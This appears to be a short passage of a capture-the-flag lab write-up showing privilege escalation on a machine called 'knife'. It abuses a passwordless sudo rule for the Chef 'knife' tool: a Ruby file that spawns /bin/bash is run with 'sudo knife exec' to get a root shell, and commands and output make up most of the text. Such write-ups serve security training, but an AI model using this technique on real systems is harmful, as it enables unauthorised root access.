3 privesc
sudo -l
Matching Defaults entries for james on knife:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife
james@knife:~$ ls -la /usr/bin/knife
lrwxrwxrwx 1 root root 31 May 7 11:03 /usr/bin/knife -> /opt/chef-workstation/bin/knife
Running sudo /usr/bin/knife gives us docs
https://docs.chef.io/workstation/knife/
https://docs.chef.io/workstation/knife_exec/
> so we can create a rb file and run it.
james@knife:/opt/chef-workstation/bin$ cd /home/james
james@knife:~$ echo "system('/bin/bash')" > shell.rb
james@knife:~$ chmod +x shell.rb
james@knife:~$ sudo /usr/bin/knife exec shell.rb
root@knife:/home/james# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)
Last updated